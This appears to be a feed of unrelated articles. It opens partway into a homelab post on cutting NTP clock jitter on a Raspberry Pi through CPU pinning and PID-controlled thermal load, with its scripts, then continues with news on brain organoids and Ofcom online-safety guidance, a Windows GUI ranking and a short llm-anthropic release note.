Modern CPUs, including those in Raspberry Pis, use dynamic frequency scaling to save power and manage heat. When the CPU is idle, it runs at a lower frequency (and voltage). When load increases, it scales up. This is great for power efficiency, but terrible for precision timekeeping.

Why? Because timekeeping (with NTP/chronyd/others) relies on a stable system clock to discipline itself against reference sources. If the CPU frequency is constantly changing, the system clock’s tick rate varies, introducing jitter into the timing measurements. Even though my PPS signal was providing a mostly perfect 1-pulse-per-second reference, the CPU’s frequency bouncing around made it harder for chronyd to maintain a stable lock.

But here’s the key insight: the system clock is ultimately derived from a crystal oscillator , and crystal oscillator frequency is temperature-dependent. The oscillator sits on the board near the CPU, and as the CPU heats up and cools down throughout the day, so does the crystal. Even a few degrees of temperature change can shift the oscillator’s frequency by parts per million – exactly what I was seeing in my frequency drift graphs. The CPU frequency scaling was one factor, but the underlying problem was that temperature changes were affecting the crystal oscillator itself. By stabilizing the CPU temperature, I could stabilize the thermal environment for the crystal oscillator, keeping its frequency consistent.

Looking at my Grafana dashboard, I could see the frequency offset wandering over a range of about 1 PPM (parts per million) as the Pi warmed up and cooled down throughout the day. The RMS offset was averaging around 86 nanoseconds, which isn’t terrible (it’s actually really, really, really good), but I knew it could be better.

The Discovery

After staring at graphs for longer than I’d like to admit, I had an idea: what if I could keep the CPU at a constant temperature? If the temperature (and therefore the frequency) stayed stable, maybe the timing would stabilize too.

The solution came in two parts:

  1. CPU core isolation – Dedicate CPU 0 exclusively to timing-critical tasks (chronyd and PPS interrupts)
  2. Thermal stabilization – Keep the other CPUs busy to maintain a constant temperature, preventing frequency scaling

Here’s what happened when I turned on the thermal stabilization system on November 17, 2025 at 09:10 AM:

NTP Frequency Stability

That vertical red line marks when I activated the “time burner” process. Notice how the frequency oscillations immediately dampen and settle into a much tighter band? Let’s dive into how this works.

The Solution Part 1: CPU Core Pinning and Real-Time Priority

The first step is isolating timing-critical operations onto a dedicated CPU core. On a Raspberry Pi (4-core ARM), this means:

  • CPU 0: Reserved for chronyd and PPS interrupts
  • CPUs 1-3: Everything else, including our thermal load

I had AI (probably Claude Sonnet 4 ish, maybe 4.5) create a boot optimization script that runs at system startup:

#!/bin/bash
# PPS NTP Server Performance Optimization Script
# Sets CPU affinity, priorities, and performance governor at boot

set -e

echo "Setting up PPS NTP server performance optimizations..."

# Wait for system to be ready
sleep 5

# Set CPU governor to performance mode
echo "Setting CPU governor to performance..."
cpupower frequency-set -g performance

# Pin PPS interrupt to CPU0 (may fail if already pinned, that's OK)
echo "Configuring PPS interrupt affinity..."
echo 1 > /proc/irq/200/smp_affinity 2>/dev/null || echo "PPS IRQ already configured"

# Wait for chronyd to start
echo "Waiting for chronyd to start..."
timeout=30
while [ $timeout -gt 0 ]; do
    chronyd_pid=$(pgrep chronyd 2>/dev/null || echo "")
    if [ -n "$chronyd_pid" ]; then
        echo "Found chronyd PID: $chronyd_pid"
        break
    fi
    sleep 1
    ((timeout--))
done

if [ -z "$chronyd_pid" ]; then
    echo "Warning: chronyd not found after 30 seconds"
else
    # Set chronyd to real-time priority and pin to CPU 0
    echo "Setting chronyd to real-time priority and pinning to CPU 0..."
    chrt -f -p 50 $chronyd_pid
    taskset -cp 0 $chronyd_pid
fi

# Boost ksoftirqd/0 priority
echo "Boosting ksoftirqd/0 priority..."
ksoftirqd_pid=$(ps aux | grep '\[ksoftirqd/0\]' | grep -v grep | awk '{print $2}')
if [ -n "$ksoftirqd_pid" ]; then
    renice -n -10 $ksoftirqd_pid
    echo "ksoftirqd/0 priority boosted (PID: $ksoftirqd_pid)"
else
    echo "Warning: ksoftirqd/0 not found"
fi

echo "PPS NTP optimization complete!"

# Log current status
echo "=== Current Status ==="
echo "CPU Governor: $(cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor)"
echo "PPS IRQ Affinity: $(cat /proc/irq/200/effective_affinity_list 2>/dev/null || echo 'not readable')"
if [ -n "$chronyd_pid" ]; then
    echo "chronyd Priority: $(chrt -p $chronyd_pid)"
fi
echo "======================"

What this does:

  1. Performance Governor : Forces all CPUs to run at maximum frequency, disabling frequency scaling
  2. PPS IRQ Pinning : Ensures PPS interrupt (IRQ 200) is handled exclusively by CPU 0
  3. Chronyd Real-Time Priority : Sets chronyd to SCHED_FIFO priority 50, giving it preferential CPU scheduling
  4. Chronyd CPU Affinity : Pins chronyd to CPU 0 using taskset
  5. ksoftirqd Priority Boost : Improves priority of the kernel softirq handler on CPU 0

This script can be added to /etc/rc.local or as a systemd service to run at boot.

The Solution Part 2: PID-Controlled Thermal Stabilization

Setting the performance governor helps, but on a Raspberry Pi, even at max frequency, the CPU temperature will still vary based on ambient conditions and load. Temperature changes affect the CPU’s actual operating frequency due to thermal characteristics of the silicon.

The solution? Keep the CPU at a constant temperature using a PID-controlled thermal load. I call it the “time burner” (inspired by CPU burn-in tools, but with precise temperature control).

As a reminder of what we’re really doing here: we’re maintaining a stable thermal environment for the crystal oscillator . The RPi 3B’s 19.2 MHz oscillator is physically located near the CPU on the Raspberry Pi board, so by actively controlling CPU temperature, we’re indirectly controlling the oscillator’s temperature. Since the oscillator’s frequency is temperature-dependent (this is basic physics of quartz crystals), keeping it at a constant temperature means keeping its frequency stable – which is exactly what we need for precise timekeeping.

Here’s how it works:

  1. Read CPU temperature from /sys/class/thermal/thermal_zone0/temp
  2. PID controller calculates how much CPU time to burn to maintain target temperature (I chose 54°C)
  3. Three worker processes run on CPUs 1, 2, and 3 (avoiding CPU 0)
  4. Each worker alternates between busy-loop (MD5 hashing) and sleeping based on PID output
  5. Temperature stabilizes at the setpoint, preventing thermal drift

Here’s the core implementation (simplified for readability):

#!/usr/bin/env python3
import time
import argparse
import multiprocessing
import hashlib
import os
from collections import deque

class PIDController:
    """Simple PID controller with output clamping and anti-windup."""
    def __init__(self, Kp, Ki, Kd, setpoint, output_limits=(0, 1), sample_time=1.0):
        self.Kp = Kp
        self.Ki = Ki
        self.Kd = Kd
        self.setpoint = setpoint
        self.output_limits = output_limits
        self.sample_time = sample_time
        self._last_time = time.time()
        self._last_error = 0.0
        self._integral = 0.0
        self._last_output = 0.0

    def update(self, measurement):
        """Compute new output of PID based on measurement."""
        now = time.time()
        dt = now - self._last_time

        if dt < self.sample_time:
            return self._last_output

        error = self.setpoint - measurement

        # Proportional
        P = self.Kp * error

        # Integral with anti-windup
        self._integral += error * dt
        I = self.Ki * self._integral

        # Derivative
        derivative = (error - self._last_error) / dt if dt > 0 else 0.0
        D = self.Kd * derivative

        # Combine and clamp
        output = P + I + D
        low, high = self.output_limits
        output = max(low, min(high, output))

        self._last_output = output
        self._last_error = error
        self._last_time = now

        return output

def read_cpu_temperature(path='/sys/class/thermal/thermal_zone0/temp'):
    """Return CPU temperature in Celsius."""
    with open(path, 'r') as f:
        temp_str = f.read().strip()
    return float(temp_str) / 1000.0

def burn_cpu(duration):
    """Busy-loop hashing for 'duration' seconds."""
    end_time = time.time() + duration
    m = hashlib.md5()
    while time.time() < end_time:
        m.update(b"burning-cpu")

def worker_loop(worker_id, cmd_queue, done_queue):
    """
    Worker process:
    - Pins itself to CPUs 1, 2, or 3 (avoiding CPU 0)
    - Burns CPU based on commands from main process
    """
    available_cpus = [1, 2, 3]
    cpu_to_use = available_cpus[worker_id % len(available_cpus)]
    os.sched_setaffinity(0, {cpu_to_use})
    print(f"Worker {worker_id} pinned to CPU {cpu_to_use}")

    while True:
        cmd = cmd_queue.get()
        if cmd is None:
            break

        burn_time, sleep_time = cmd
        burn_cpu(burn_time)
        time.sleep(sleep_time)
        done_queue.put(worker_id)

# Main control loop (simplified)
def main():
    target_temp = 54.0  # degrees Celsius
    control_window = 0.20  # 200ms cycle time

    pid = PIDController(Kp=0.05, Ki=0.02, Kd=0.0,
                        setpoint=target_temp,
                        sample_time=0.18)

    # Start 3 worker processes
    workers = []
    cmd_queues = []
    done_queue = multiprocessing.Queue()

    for i in range(3):
        q = multiprocessing.Queue()
        p = multiprocessing.Process(target=worker_loop, args=(i, q, done_queue))
        p.start()
        workers.append(p)
        cmd_queues.append(q)

    try:
        while True:
            # Measure temperature
            current_temp = read_cpu_temperature()

            # PID control: output is fraction of time to burn (0.0 to 1.0)
            output = pid.update(current_temp)

            # Convert to burn/sleep times
            burn_time = output * control_window
            sleep_time = control_window - burn_time

            # Send command to all workers
            for q in cmd_queues:
                q.put((burn_time, sleep_time))

            # Wait for workers to complete
            for _ in range(3):
                done_queue.get()

            print(f"Temp={current_temp:.2f}C, Output={output:.2f}, "
                  f"Burn={burn_time:.2f}s")

    except KeyboardInterrupt:
        for q in cmd_queues:
            q.put(None)
        for p in workers:
            p.join()

if __name__ == '__main__':
    main()

The full implementation includes a temperature filtering system to smooth out sensor noise and command-line arguments for tuning the PID parameters.

PID Tuning Notes:

  • Kp=0.05 : Proportional gain – responds to current error
  • Ki=0.02 : Integral gain – eliminates steady-state error
  • Kd=0.0 : Derivative gain – set to zero because temperature changes slowly

The target temperature of 54°C was chosen empirically – high enough to keep the CPU from idling down, but low enough to avoid thermal throttling (which starts around 80°C on Raspberry Pi).

The Results: Numbers Don’t Lie

The improvement was immediately visible. Here are the statistics comparing performance before and after the optimization:

A note on ambient conditions: The Raspberry Pi lives in a project enclosure in our master bedroom (chosen for its decent GPS reception and ADS-B coverage for a new aircraft AR overlay app idea I’m working on also running on this Pi). While the time burner maintains the CPU die temperature at 54°C, the enclosure is still subject to ambient temperature swings. Room temperature cycles from a low of 66°F (18.9°C) at 5:15 AM to a peak of 72°F (22.2°C) at 11:30 AM – a 6°F daily swing from our heating schedule. The fact that we see such dramatic frequency stability improvements despite this ambient variation speaks to how effective the thermal control is. The CPU’s active heating overwhelms the environmental changes, maintaining consistent silicon temperature where it matters most.

Frequency Stability

Frequency Variability
Metric               Before      After       Improvement
Mean RMS Offset      85.44 ns    43.54 ns    49.0% reduction
Median RMS Offset    80.13 ns    37.93 ns    52.7% reduction

The RMS offset is chronyd’s estimate of the timing uncertainty. Cutting this nearly in half means the system is maintaining significantly better time accuracy.

Setup Instructions

Want to replicate this? Here’s the step-by-step process:

Prerequisites

You need a working GPS PPS NTP server setup. If you don’t have one yet, follow my 2025 NTP guide first.

Step 0: Install Required Tools

sudo apt-get update
sudo apt-get install linux-cpupower python3 util-linux

Step 1: Create the Boot Optimization Script

Save the optimization script from earlier as /usr/local/bin/pps-optimize.sh :

sudo nano /usr/local/bin/pps-optimize.sh
# Paste the script content
sudo chmod +x /usr/local/bin/pps-optimize.sh

Step 2: Create Systemd Service for Boot Script

Create /etc/systemd/system/pps-optimize.service :

[Unit]
Description=PPS NTP Performance Optimization
After=chronyd.service
Requires=chronyd.service

[Service]
Type=oneshot
ExecStart=/usr/local/bin/pps-optimize.sh
RemainAfterExit=yes

[Install]
WantedBy=multi-user.target

Enable it:

sudo systemctl enable pps-optimize.service

Step 3: Install the Time Burner Script

Save the time burner Python script as /usr/local/bin/time_burner.py :

sudo nano /usr/local/bin/time_burner.py
# Paste the full time burner script
sudo chmod +x /usr/local/bin/time_burner.py

Step 4: Create Systemd Service for Time Burner

Create /etc/systemd/system/time-burner.service :

[Unit]
Description=CPU Thermal Stabilization for NTP
After=network.target

[Service]
Type=simple
User=root
ExecStart=/usr/bin/python3 /usr/local/bin/time_burner.py -t 54.0 -n 3
Restart=always
RestartSec=10

[Install]
WantedBy=multi-user.target

Enable and start it:

sudo systemctl enable time-burner.service
sudo systemctl start time-burner.service

Step 5: Verify the Setup

Check that everything is running:

# Verify CPU governor
cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor
# Should output: performance

# Check chronyd CPU affinity and priority
ps -eo pid,comm,psr,ni,rtprio | grep chronyd
# Should show psr=0 (CPU 0) and rtprio=50

# Check time burner processes
ps aux | grep time_burner
# Should show 4 processes (1 main + 3 workers)

# Monitor NTP performance
chronyc tracking

Example output from chronyc tracking :

Reference ID    : 50505300 (PPS)
Stratum         : 1
Ref time (UTC)  : Sun Nov 24 16:45:23 2025
System time     : 0.000000038 seconds fast of NTP time
Last offset     : -0.000000012 seconds
RMS offset      : 0.000000035 seconds
Frequency       : 1.685 ppm slow
Residual freq   : -0.001 ppm
Skew            : 0.002 ppm
Root delay      : 0.000000001 seconds
Root dispersion : 0.000010521 seconds
Update interval : 16.0 seconds
Leap status     : Normal

Notice the RMS offset of 35 nanoseconds – this is the kind of accuracy you can achieve with thermal stabilization.

Step 6: Monitor Over Time

(Topic for a future post)

Set up Grafana dashboards to monitor:

  • Frequency offset (PPM)
  • RMS offset (nanoseconds)
  • CPU temperature
  • System time offset

You’ll see the frequency stabilize within a few hours as the PID controller locks onto the target temperature.

Monitoring and Troubleshooting

Real-Time Monitoring

Watch chronyd tracking in real-time:

watch -n 1 "chronyc tracking"

Check time burner status:

sudo systemctl status time-burner.service

View time burner output:

sudo journalctl -u time-burner.service -f

Common Issues

Temperature overshoots or oscillates:

  • Adjust PID gains – reduce Kp if oscillating, increase Ki if steady-state error
  • Try different target temperatures (50-60°C range)

High CPU usage (obviously):

  • This is intentional – the time burner uses ~90% of 3 cores
  • Not suitable for Pis running other workloads

Chronyd not pinned to CPU 0:

  • Check that the optimization script runs after chronyd starts
  • Adjust the timing in the systemd service dependencies

Trade-offs and Considerations

Let’s be honest about the downsides:

Power Consumption

The time burner keeps 3 cores at ~30% average utilization. My Pi now draws about 3-4W continuously (vs 1-2W idle). Over a year, that’s an extra 15-25 kWh, or about $2-3 in electricity (depending on your rates).

Heat

Running at 54°C means the Pi is warm to the touch. This is well within safe operating temperature (thermal throttling doesn’t start until 80°C), but you might want to ensure adequate ventilation. I added a small heatsink just to be safe.

CPU Resources

You’re dedicating 3 of 4 cores to burning cycles. This is fine for a dedicated NTP server, but not suitable if you’re running other services on the same Pi. That said, I am also running the feeder to my new ADS-B aircraft visualization app on it. My readsb instance regularly gets to 1200 msg/s with 200+ aircraft.

Is It Worth It?

For 99.999% of use cases: absolutely not .

Most applications don’t need better than millisecond accuracy, let alone the 35-nanosecond RMS offset I’m achieving. Even for distributed systems, microsecond-level accuracy is typically overkill.

When this might make sense:

  • Precision timing applications (scientific instrumentation, radio astronomy)
  • Distributed systems research requiring tight clock synchronization
  • Network testing where timing precision affects results
  • Because you can (the best reason for any homelab project)

For me, this falls squarely in the “because you can” category. I had the monitoring infrastructure in place, noticed the thermal correlation, and couldn’t resist solving the problem. Plus, I learned a lot about PID control, CPU thermal characteristics, and Linux real-time scheduling.

Future Improvements

Some ideas I’m considering:

Adaptive PID Tuning

The current PID gains are hand-tuned for a specific ambient temperature range. The fairly low P value is to avoid spikes when some load on the Pi kicks up the temp. The I is a balance to keep long term “burn” relatively consistent. Implementing an auto-tuning algorithm (like Ziegler-Nichols) or adaptive PID could handle seasonal temperature variations better.

Hardware Thermal Control

Instead of software thermal control, I could add an actively cooled heatsink with PWM fan control. This might achieve similar temperature stability while using less power overall.

Oven-Controlled Crystal Oscillator (OCXO)

For the ultimate in frequency stability, replacing the Pi’s crystal with a temperature-controlled OCXO would eliminate thermal drift at the source. This is how professional timing equipment works. I do have a BH3SAP GPSDO sitting next to me (subject to a future post)… Then again, I’m the person who just wrote 4000 words about optimizing a $50 time server, so who am I kidding?

Conclusions

Through a combination of CPU core isolation and PID-controlled thermal stabilization, I achieved:

  • 81% reduction in frequency variability
  • 77% reduction in frequency standard deviation
  • 74% reduction in frequency range
  • 49% reduction in RMS offset

The system now maintains 38-nanosecond median RMS offset from the GPS PPS reference, with frequency drift that’s barely detectable in the noise. The CPU runs at a constant 54°C, and in steady state, the frequency offset stays within a tight ±0.14 PPM band (compared to ±0.52 PPM before optimization).

Was this necessary? No. Did I learn a bunch about thermal management, PID control, and Linux real-time scheduling? Yes. Would I do it again? Absolutely.

Resource

I did come across a “burn” script that was the basis for this thermal management. I can’t find it at the moment, but when I do I’ll link it here.

Have questions or suggestions? Drop a comment below. I’m particularly interested to hear if anyone has tried alternative thermal management approaches or has experience with OCXO modules for Raspberry Pi timing applications.

Thanks for reading, and happy timekeeping!

Human brains are preconfigured with instructions for understanding the world

Hacker News
news.ucsc.edu
2025-11-25 06:31:31
Comments...
Original Article

Key takeaways

  • New findings suggest the brain has preconfigured, structured activity patterns even before sensory experiences occur.
  • UC Santa Cruz researchers used brain organoids to study the brain’s earliest electrical activity.
  • Understanding early brain patterns could have important implications for diagnosing and treating developmental brain disorders.

Humans have long wondered when and how we begin to form thoughts. Are we born with a pre-configured brain, or do thought patterns only begin to emerge in response to our sensory experiences of the world around us? Now, science is getting closer to answering the questions philosophers have pondered for centuries.

Researchers at the University of California, Santa Cruz, are using tiny models of human brain tissue, called organoids, to study the earliest moments of electrical activity in the brain. A new study in Nature Neuroscience finds that the earliest firings of the brain occur in structured patterns without any external experiences, suggesting that the human brain is preconfigured with instructions about how to navigate and interact with the world.

“These cells are clearly interacting with each other and forming circuits that self-assemble before we can experience anything from the outside world,” said Tal Sharf, assistant professor of biomolecular engineering at the Baskin School of Engineering and the study’s senior author. “There’s an operating system that exists, that emerges in a primordial state. In my laboratory, we grow brain organoids to peer into this primordial version of the brain’s operating system and study how the brain builds itself before it’s shaped by sensory experience.”

In improving our fundamental understanding of human brain development, these findings can help researchers better understand neurodevelopmental disorders, and pinpoint the impact of toxins like pesticides and microplastics in the developing brain.

Sharf holds a CMOS-based microelectrode array chip. These devices contain thousands of miniaturized amplifiers used to triangulate the electrical activity of single neurons within millimeter-sized organoid tissue.

Studying the developing brain

The brain, similar to a computer, runs on electrical signals—the firing of neurons. When these signals begin to fire, and how the human brain develops, are challenging topics for scientists to study, as the early developing human brain is protected within the womb.

Organoids, which are 3D models of tissue grown from human stem cells in the lab, provide a unique window into brain development. The Braingeneers group at UC Santa Cruz, in collaboration with researchers at UC San Francisco and UC Santa Barbara, are pioneering methods to grow these models and take measurements from them to gain insights into brain development and disorders.

Organoids are particularly useful for understanding if the brain develops in response to sensory input—as they exist in the lab setting and not the body—and can be grown ethically in large quantities. In this study, researchers prompted stem cells to form brain tissue, and then measured their electrical activity using specialized microchips, similar to those that run a computer. Sharf’s background in applied physics, computation, and neurobiology forms his expertise in modelling the circuitry of the early brain.

“An organoid system that’s intrinsically decoupled from any sensory input or communication with organs gives you a window into what’s happening with this self-assembly process,” Sharf said. “That self-assembly process is really hard to do with traditional 2D cell culture—you can’t get the cell diversity and the architecture. The cells need to be in intimate contact with each other. We’re trying to control the initial conditions, so we can let biology do its wonderful thing.”

The Sharf lab is developing novel neural interfaces, leveraging expertise in physics, materials science, and electrical engineering. On the right, Koushik Devarajan, an electrical and computer engineering Ph.D. student in the Sharf lab.

Pattern production

The researchers observed the electrical activity of the brain tissue as they self-assembled from stem cells into a tissue that can translate the senses and produce language and conscious thought. They found that within the first few months of development, long before the human brain is capable of receiving and processing complex external sensory information such as vision and hearing, its cells spontaneously began to emit electrical signals characteristic of the patterns that underlie translation of the senses.

Through decades of neuroscience research, the community has discovered that neurons fire in patterns that aren’t just random. Instead, the brain has a “default mode” — a basic underlying structure for firing neurons which then becomes more specific as the brain processes unique signals like a smell or taste. This background mode outlines the possible range of sensory responses the body and brain can produce.

In their observations of single neuron spikes in the self-assembling organoid models, Sharf and colleagues found that these earliest observable patterns have striking similarity with the brain’s default mode. Even without having received any sensory input, they are firing off a complex repertoire of time-based patterns, or sequences, which have the potential to be refined for specific senses, hinting at a genetically encoded blueprint inherent to the neural architecture of the living brain.

“These intrinsically self-organized systems could serve as a basis for constructing a representation of the world around us,” Sharf said. “The fact that we can see them in these early stages suggests that evolution has figured out a way that the central nervous system can construct a map that would allow us to navigate and interact with the world.”

Knowing that these organoids produce the basic structure of the living brain opens up a range of possibilities for better understanding human neurodevelopment, disease, and the effects of toxins in the brain.

“We’re showing that there is a basis for capturing complex dynamics that likely could be signatures of pathological onsets that we could study in human tissue,” Sharf said. “That would allow us to develop therapies, working with clinicians at the preclinical level to potentially develop compounds, drug therapies, and gene editing tools that could be cheaper, more efficient, higher throughput.”

This study included researchers at UC Santa Barbara, Washington University in St. Louis, Johns Hopkins University, the University Medical Center Hamburg-Eppendorf, and ETH Zurich.

The Sharf lab.

Ofcom urges social media platforms to combat abuse and limit online ‘pile-ons’

Guardian
www.theguardian.com
2025-11-25 06:00:26
New guidance from UK regulator aims to combat misogynist abuse and ‘revenge porn’ Social media platforms are being urged to limit internet “pile-ons” under new guidelines to protect women and girls online. The guidance from Ofcom, the UK communications regulator, to combat misogynist abuse, coercive...
Original Article

Social media platforms are being urged to limit internet “pile-ons” under new guidelines to protect women and girls online.

The guidance from Ofcom , the UK communications regulator, to combat misogynist abuse, coercive control and the sharing of intimate images without consent comes into force on Tuesday and includes recommendations to prevent women being harried online.

The measures suggest tech companies enforce limits on the number of responses to posts on platforms such as X , in a move that Ofcom hopes will reduce pile-ons, where individual users are deluged with abusive replies to their posts.

Other measures raised by Ofcom include platforms using a database of images to protect women and girls from the sharing of intimate images without the subject’s consent – often referred to as “revenge porn”.

The watchdog is urging the use of “hash-matching” technology, which allows platforms to take down an image that has been the subject of a complaint. Under the system, an image or video reported by a user is cross-referenced against a database of illicit images – for instance, a “revenge porn” image or an explicit deepfake – that have been converted into “hashes”, or digital fingerprints. This allows harmful images to be detected and removed from circulation.

The recommendations have been made under the Online Safety Act (OSA), a landmark piece of legislation designed to protect children and adults from harmful material on the internet.

Although the recommendations are technically voluntary, Ofcom has put pressure on social media companies to comply, saying it will publish a report in 2027 on how individual platforms have responded to the guidelines.

The regulator added that the OSA could be toughened if the recommendations were ignored or implemented ineffectively.

“If their action falls short, we will consider making formal recommendations to government on where the Online Safety Act may need to be strengthened,” said Ofcom.

Dame Melanie Dawes, Ofcom’s chief executive, said she had encountered “shocking” stories of online abuse suffered by women and girls.

Melanie Dawes, the chief executive of Ofcom. Photograph: Zuma Press Inc/Alamy

“We are sending a clear message to tech firms to step up and act in line with our practical industry guidance, to protect their female users against the very real online risks they face today,” said Dawes. “With the continued support of campaigners, advocacy groups and expert partners, we will hold companies to account and set a new standard for women’s and girls’ online safety in the UK.”

Other recommendations announced by Ofcom include: deploying prompts asking people to think twice before posting abusive content; imposing “time-outs” for people who repeatedly misuse a platform; preventing misogynistic users from earning a share of advertising revenue related to their posts; and allowing users to quickly block or mute multiple accounts at once.

The recommendations finalise a process launched in February when Ofcom issued a consultation that included the hash-matching measure. However, more than a dozen of the guidelines, including setting “rate limits” on posts, are entirely new.

Internet Matters, a nonprofit dedicated to children’s online safety, said the government should make the guidance mandatory and warned that many tech companies were likely to ignore it. Ofcom is consulting on whether to make the hash-matching recommendation mandatory.

Rachel Huggins, co-chief executive at Internet Matters, said: “We know that many companies will not adopt the guidance simply because it is not statutory, meaning the unacceptable levels of online harm which women and girls face today will remain high.”

Windows GUI – Good, Bad and Pretty Ugly (2023)

Hacker News
creolened.com
2025-11-25 05:33:44
Comments...
Original Article

Windows launched way back in 1985, when I was still using a Commodore 64 and PCs were all of four years old–barely out of diapers. The GUI, or Graphical User Interface, has changed a lot over the years and I thought it might be fun/horrifying to rank every major version of the Windows GUI, from Windows 1.0 in 1985, to Windows 11 as of 2023.

I’m rating not based on how the system looked at the time (you can only do so much with CGA/EGA graphics, after all), but on how they look now. Is this fair? Probably not, but as always, I make the rules!

The rating system is based on a scale of 1 to 10 Clippys, with 10 being best.

NOTE: I am skipping over all versions of Windows NT because it follows the look of other versions mentioned below.

Overall Rankings:

  1. Windows 11
  2. Windows 2000
  3. Windows 95/98/Vista/7
  4. Windows 10
  5. Windows 3.0/3.1/XP
  6. Windows 8.1
  7. Windows 8
  8. Windows 2.0
  9. Windows 1.0

Windows 1.0 (1985)
Rating: 1 Clippy

In 1985, Windows ran on top of DOS, had drop-down menus, fixed windows, and CGA graphics. In a way, the extremely limited colour palette actually made it more colourful. Perhaps too colourful. This is pretty ugly all around. If you are a fan of this, you probably wear plaid bow ties unironically.

Windows 2.0 (1987)
Rating: 2.5 Clippys

This is where Windows goes from hideously ugly to just unattractive. The menu bars and arrows have been refined a little, and now you get resizable windows. It’s like a colour Macintosh, but hit with an ugly stick. And still needs to run on top of DOS.

Windows 3.0 (1990)
Rating: 6 Clippys

Microsoft makes a big leap with Windows 3, the first version to offer a coherent GUI, with pseudo 3D elements for buttons and scroll bars. Support for VGA graphics also means the cartoony look has gone away, making it look that much more professional. It still needs DOS and has that weird File Manager/Program Manager split. Oh, and Minesweeper.

Windows 3.1 (1992)
Rating: 6 Clippys

Windows hits the big time. This is the version where it was clear Windows was the future and DOS was the past. Windows 3.1 actually doesn’t look much different than 3.0, though, so it rates the same.

Windows 95 (1995)
Rating: 7.5 Clippys

With Windows 95, Microsoft managed to produce a version of its OS that scared Apple so much they ended up bringing Steve Jobs back, along with his own operating system, NeXTSTEP. Windows 95 introduced the taskbar, the Start button (it’s even labelled Start, how quaint!), a proper desktop and a continued refinement with the 3D bevelled look. The GUI is also simplified in some ways, with the title bar widgets all getting moved to the top-right corner. Icons are more detailed and colours are overall more subdued.

While it looks dated to our 2023 eyes, this GUI remains just as clear and functional today as it was 28 (!) years ago.

Windows 98 (1998)
Rating: 7.5 Clippys

Windows 98 basically looks the same as Windows 95, but Microsoft did add a stylin’ gradient effect to title bars. It’s not enough to change its rating over 95, though. Sorry, MS!

Note: I am skipping Windows Millennium Edition (Me) because while it had changes under the hood, visually it is pretty much Windows 98 Third Edition.

Windows 2000 (2000)
Rating: 8 Clippys

I admit bias here. First, this is essentially a version of Windows NT, which I said I wouldn’t be rating. Second, it really just brings the 95/98 look to the NT version of Windows. But this was the first version of Windows that tried to bridge the gap between consumer and business versions–and it mostly worked (if you could get it at a discount, like I did at the time). I give it a slight edge because they changed some of the icons, improving them, in my view. It also had a generally more sophisticated veneer–the last version of Windows to really use this approach for many years.

Windows XP (2001)
Rating: 6 Clippys

Our first regression! Windows XP gave us a pretty wallpaper (probably the most famous OS wallpaper ever) and there’s something I find pleasing about the look of its buttons and most of its icons. The bevelled look, combined with much brighter colours, though, gives the OS a decidedly less serious look. I’m not sure what Microsoft was going for, but I don’t think “cartoony” is what they had in mind. Not a total disaster or anything, but kind of goofy-looking in hindsight.

Windows Vista (2006)
Rating: 7.5 Clippys

With Vista, Microsoft sought to strip away the bright, simple colours of XP in favour of a glossy 3D sheen. For the most part, I think it works, though transparency does get a bit out of hand at times. I like how the Start button now looks more like a button. Icons are cleaner and more detailed. This is Microsoft saying Windows is all grown up now. Too bad about all the driver issues and steep system requirements.

Windows 7 (2009)
Rating: 7.5 Clippys

As you can see, Windows 7 is pretty much Vista, but with the transparency toned down. This is welcome, but it’s not enough to change its rating over Vista.

Windows 8 (2012)
Rating: 5 Clippys

And here we have a major step back. Microsoft somehow thought that in 2012 everyone would be using tablets with swipe gestures, and designed Windows 8’s GUI around this. They also elected to do away with finely-detailed icons in favour of simple, single-colour tiles and widgets. But the tiles could be one of many colours (and sizes), so you ended up with a crazy quilt look (see the screenshot below for a representative example). They got rid of the Start menu and the Start button. This is ugly. If you like Windows 8’s look, you are a bad person. You are the one Steve Jobs was talking about when he said Microsoft had no taste.

Windows 8.1 (2013)
Rating: 5.5 Clippys

Windows 8.1 made some changes, such as adding back the Start button and including the option to boot to the desktop, but the GUI was mostly the same, and just as ugly.

Windows 10 (2015)
Rating: 6.5 Clippys

Windows 10’s main mission was to undo Windows 8. It brought back the Start menu, it made the desktop the central part of the UI again, and it tamed some of the tile experience, though the flat look still persisted. This frankenOS approach means it feels like a cross between Windows 7 and 8. It’s not bad, but it’s also clearly the result of yanking the Windows GUI off in a new and unplanned direction.

Windows 11 (2021)
Rating: 8 Clippys

There are things to critique about Windows 11–its security requirements, the all but mandatory MS account, a push toward oversimplification of the Start menu. But in terms of GUI, this is probably the most refined the OS has been since 2000. It also restores a cohesion to the look of the OS that had been missing since Windows 7 in 2009. Sure, it’s clearly aping macOS in some ways, like the rounded corners on windows, but everything looks very clean. I actually would give this version the nod, aesthetically, over the current version of macOS (Monterey as I write this)–though not by a lot. The biggest knocks are its lack of customization (in some regards), removal of features (the taskbar can no longer be moved to other edges of the screen) and Microsoft’s annoying habit of adding more intrusive bloatware, pop-ups and other distractions. Looks-wise, though, it’s pretty nice!

Overall, the versions I feel Microsoft got right (and iterated on) were:

  • Windows 3.0
  • Windows 95
  • Windows Vista
  • Windows 11

The ones that struck out were:

  • Windows XP
  • Windows 8

The early versions (1.0 and 2.0) were hamstrung by the technology at the time, while Windows 10 had to pick up the pieces from Windows 8.

Rumours say Microsoft is working on Windows 12. If so, I wouldn’t expect it to depart visually from Windows 11, but you never know.

llm-anthropic 0.23

Simon Willison
simonwillison.net
2025-11-25 05:26:34
llm-anthropic 0.23 New plugin release adding support for Claude Opus 4.5, including the new thinking_effort option: llm install -U llm-anthropic llm -m claude-opus-4.5 -o thinking_effort low 'muse on pelicans' This took longer to release than I had hoped because it was blocked on Anthropic shipping...
Original Article

llm-anthropic 0.23. New plugin release adding support for Claude Opus 4.5, including the new thinking_effort option:

llm install -U llm-anthropic
llm -m claude-opus-4.5 -o thinking_effort low 'muse on pelicans'

This took longer to release than I had hoped because it was blocked on Anthropic shipping 0.75.0 of their Python library with support for thinking effort.
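
For anyone who prefers the Python API over the CLI, a rough sketch of the same call is below. It assumes the plugin and an Anthropic API key are already configured for llm; the option name mirrors the -o thinking_effort flag shown above.

import llm

# Assumes llm-anthropic 0.23+ is installed and an Anthropic key is set.
model = llm.get_model("claude-opus-4.5")

# Keyword arguments map to the CLI's -o options.
response = model.prompt("muse on pelicans", thinking_effort="low")
print(response.text())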

Posted 25th November 2025 at 5:26 am

Jeff Dean on Important AI Trends

Lobsters
www.youtube.com
2025-11-25 05:25:56
Comments...

Immigration Raids at This Home Depot Got More Aggressive but Less Effective. The LA Tenants Union Knows Why.

Portside
portside.org
2025-11-25 04:09:25
